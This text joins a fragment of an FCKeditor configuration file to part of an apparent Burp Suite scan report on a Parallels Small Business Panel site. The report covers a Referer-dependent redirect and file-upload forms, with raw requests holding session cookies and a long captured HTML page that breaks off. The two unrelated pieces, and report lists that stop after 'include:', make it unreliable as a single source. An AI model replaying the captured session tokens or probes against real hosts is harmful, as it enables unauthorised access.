   [ CTRL + 86 /*V*/, 'Paste' ],
   [ CTRL + 45 /*INS*/, true ],
   [ SHIFT + 45 /*INS*/, 'Paste' ],
   [ CTRL + 88 /*X*/, 'Cut' ],
   [ SHIFT + 46 /*DEL*/, 'Cut' ],
   [ CTRL + 90 /*Z*/, 'Undo' ],
   [ CTRL + 89 /*Y*/, 'Redo' ],
   [ CTRL + SHIFT + 90 /*Z*/, 'Redo' ],
   [ CTRL + 76 /*L*/, 'Link' ],
   [ CTRL + 66 /*B*/, 'Bold' ],
   [ CTRL + 73 /*I*/, 'Italic' ],
   [ CTRL + 85 /*U*/, 'Underline' ],
   [ CTRL + SHIFT + 83 /*S*/, 'Save' ],
   [ CTRL + ALT + 13 /*ENTER*/, 'FitWindow' ]
] ;

FCKConfig.ContextMenu = ['Generic','Link','Anchor','Image','Flash','Select','Textarea','Checkbox','Radio','TextField','HiddenField','ImageButton','Button','BulletedList','NumberedList','Table','Form'] ;
FCKConfig.BrowserContextMenuOnCtrl = false ;

FCKConfig.EnableMoreFontColors = true ;
FCKConfig.FontColors = '000000,993300,333300,003300,003366,000080,333399,333333,800000,FF6600,808000,808080,008080,0000FF,666699,808080,FF0000,FF9900,99CC00,339966,33CCCC,3366FF,800080,999999,FF00FF,FFCC00,FFFF00,00FF00,00FFFF,00CCFF,993366,C0C0C0,FF99CC,FFCC99,FFFF99,CCFFCC,CCFFFF,99CCFF,CC99FF,FFFFFF' ;

FCKConfig.FontFormats    = 'p;h1;h2;h3;h4;h5;h6;pre;address;div' ;
FCKConfig.FontNames        = 'Arial;Comic Sans MS;Courier New;Tahoma;Times New Roman;Verdana' ;
FCKConfig.FontSizes        = 'smaller;larger;xx-small;x-small;small;medium;large;x-large;xx-large' ;

FCKConfig.StylesXmlPath        = FCKConfig.EditorPath + 'fckstyles.xml' ;
FCKConfig.TemplatesXmlPath    = FCKConfig.EditorPath + 'fcktemplates.xml' ;

FCKConfig.SpellChecker            = 'ieSpell' ;    // 'ieSpell' | 'SpellerPages'
FCKConfig.IeSpellDownloadUrl    = 'http://www.iespell.com/download.php' ;
FCKConfig.SpellerPagesServerScript = 'server-scripts/spellchecker.php' ;    // Available extension: .php .cfm .pl
FCKConfig.FirefoxSpellChecker    = false ;

FCKConfig.MaxUndoLevels = 15 ;

FCKConfig.DisableObjectResizing = false ;
FCKConfig.DisableFFTableHandles = true ;

FCKConfig.LinkDlgHideTarget        = false ;
FCKConfig.LinkDlgHideAdvanced    = false ;

FCKConfig.ImageDlgHideLink        = false ;
FCKConfig.ImageDlgHideAdvanced    = false ;

FCKConfig.FlashDlgHideAdvanced    = false ;

FCKConfig.ProtectedTags = '' ;

// This will be applied to the body element of the editor
FCKConfig.BodyId = '' ;
FCKConfig.BodyClass = '' ;

FCKConfig.DefaultStyleLabel = '' ;
FCKConfig.DefaultFontFormatLabel = '' ;
FCKConfig.DefaultFontLabel = '' ;
FCKConfig.DefaultFontSizeLabel = '' ;

FCKConfig.DefaultLinkTarget = '' ;

// The option switches between trying to keep the html structure or do the changes so the content looks like it was in Word
FCKConfig.CleanWordKeepsStructure = false ;

// Only inline elements are valid.
FCKConfig.RemoveFormatTags = 'b,big,code,del,dfn,em,font,i,ins,kbd,q,samp,small,span,strike,strong,sub,sup,tt,u,var' ;

// Attributes that will be removed
FCKConfig.RemoveAttributes = 'class,style,lang,width,height,align,hspace,valign' ;

FCKConfig.CustomStyles =
{
   'Red Title'    : { Element : 'h3', Styles : { 'color' : 'Red' } }
};

// Do not add, rename or remove styles here. Only apply definition changes.
FCKConfig.CoreStyles =
{
   // Basic Inline Styles.
   'Bold'            : { Element : 'strong', Overrides : 'b' },
   'Italic'        : { Element : 'em', Overrides : 'i' },
   'Underline'        : { Element : 'u' },
   'StrikeThrough'    : { Element : 'strike' },
   'Subscript'        : { Element : 'sub' },
   'Superscript'    : { Element : 'sup' },

   // Basic Block Styles (Font Format Combo).
   'p'                : { Element : 'p' },
   'div'            : { Element : 'div' },
   'pre'            : { Element : 'pre' },
   'address'        : { Element : 'address' },
   'h1'            : { Element : 'h1' },
   'h2'            : { Element : 'h2' },
   'h3'            : { Element : 'h3' },
   'h4'            : { Element : 'h4' },
   'h5'            : { Element : 'h5' },
   'h6'            : { Element : 'h6' },

   // Other formatting features.
   'FontFace' :
   {
       Element        : 'span',
       Styles        : { 'font-family' : '#("Font")' },
       Overrides    : [ { Element : 'font', Attributes : { 'face' : null } } ]
   },

   'Size' :
   {
       Element        : 'span',
       Styles        : { 'font-size' : '#("Size","fontSize")' },
       Overrides    : [ { Element : 'font', Attributes : { 'size' : null } } ]
   },

   'Color' :
   {
       Element        : 'span',
       Styles        : { 'color' : '#("Color","color")' },
       Overrides    : [ { Element : 'font', Attributes : { 'color' : null } } ]
   },

   'BackColor'        : { Element : 'span', Styles : { 'background-color' : '#("Color","color")' } },

   'SelectionHighlight' : { Element : 'span', Styles : { 'background-color' : 'navy', 'color' : 'white' } }
};

// The distance of an indentation step.
FCKConfig.IndentLength = 40 ;
FCKConfig.IndentUnit = 'px' ;

// Alternatively, FCKeditor allows the use of CSS classes for block indentation.
// This overrides the IndentLength/IndentUnit settings.
FCKConfig.IndentClasses = [] ;

// [ Left, Center, Right, Justified ]
FCKConfig.JustifyClasses = [] ;

// The following value defines which File Browser connector and Quick Upload
// "uploader" to use. It is valid for the default implementaion and it is here
// just to make this configuration file cleaner.
// It is not possible to change this value using an external file or even
// inline when creating the editor instance. In that cases you must set the
// values of LinkBrowserURL, ImageBrowserURL and so on.
// Custom implementations should just ignore it.
var _FileBrowserLanguage    = 'php' ;    // asp | aspx | cfm | lasso | perl | php | py
var _QuickUploadLanguage    = 'php' ;    // asp | aspx | cfm | lasso | perl | php | py

// Don't care about the following two lines. It just calculates the correct connector
// extension to use for the default File Browser (Perl uses "cgi").
var _FileBrowserExtension = _FileBrowserLanguage == 'perl' ? 'cgi' : _FileBrowserLanguage ;
var _QuickUploadExtension = _QuickUploadLanguage == 'perl' ? 'cgi' : _QuickUploadLanguage ;

FCKConfig.LinkBrowser = true ;
FCKConfig.LinkBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.LinkBrowserWindowWidth    = FCKConfig.ScreenWidth * 0.7 ;        // 70%
FCKConfig.LinkBrowserWindowHeight    = FCKConfig.ScreenHeight * 0.7 ;    // 70%

FCKConfig.ImageBrowser = true ;
FCKConfig.ImageBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Type=Image&Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.ImageBrowserWindowWidth = FCKConfig.ScreenWidth * 0.7 ;    // 70% ;
FCKConfig.ImageBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;    // 70% ;

FCKConfig.FlashBrowser = true ;
FCKConfig.FlashBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Type=Flash&Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.FlashBrowserWindowWidth = FCKConfig.ScreenWidth * 0.7 ;    //70% ;
FCKConfig.FlashBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;    //70% ;

FCKConfig.LinkUpload = true ;
FCKConfig.LinkUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension ;
FCKConfig.LinkUploadAllowedExtensions    = ".(7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip)$" ;            // empty for all
FCKConfig.LinkUploadDeniedExtensions    = "" ;    // empty for no one

FCKConfig.ImageUpload = true ;
FCKConfig.ImageUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension + '?Type=Image' ;
FCKConfig.ImageUploadAllowedExtensions    = ".(jpg|gif|jpeg|png|bmp)$" ;        // empty for all
FCKConfig.ImageUploadDeniedExtensions    = "" ;                            // empty for no one

FCKConfig.FlashUpload = true ;
FCKConfig.FlashUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension + '?Type=Flash' ;
FCKConfig.FlashUploadAllowedExtensions    = ".(swf|flv)$" ;        // empty for all
FCKConfig.FlashUploadDeniedExtensions    = "" ;                    // empty for no one

FCKConfig.SmileyPath    = FCKConfig.BasePath + 'images/smiley/msn/' ;
FCKConfig.SmileyImages    = ['regular_smile.gif','sad_smile.gif','wink_smile.gif','teeth_smile.gif','confused_smile.gif','tounge_smile.gif','embaressed_smile.gif','omg_smile.gif','whatchutalkingabout_smile.gif','angry_smile.gif','angel_smile.gif','shades_smile.gif','devil_smile.gif','cry_smile.gif','lightbulb.gif','thumbs_down.gif','thumbs_up.gif','heart.gif','broken_heart.gif','kiss.gif','envelope.gif'] ;
FCKConfig.SmileyColumns = 8 ;
FCKConfig.SmileyWindowWidth        = 320 ;
FCKConfig.SmileyWindowHeight    = 210 ;

FCKConfig.BackgroundBlockerColor = '#ffffff' ;
FCKConfig.BackgroundBlockerOpacity = 0.50 ;

5. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:33:49 GMT
Connection: close

Request 2

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Start
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:37:29 GMT
Connection: close


6. File upload functionality  previous  next
There are 3 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


6.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Design

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /Wizard/Design HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:47:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Design -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('INCORRECT-PAGE-NUMBER', 'Incorrect format of the page number.');
           
               SbAppendLocaleKey('MAX-PAGE-NUMBER', 'The value exceeds the maximum allowed limit.');
           
               SbAppendLocaleKey('EMPTY-UPLOAD-FILE', 'Please select a file to upload.');
           
               SbAppendLocaleKey('EMPTY-SITE-TITLE', 'Please enter a site title.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Design');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Design"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
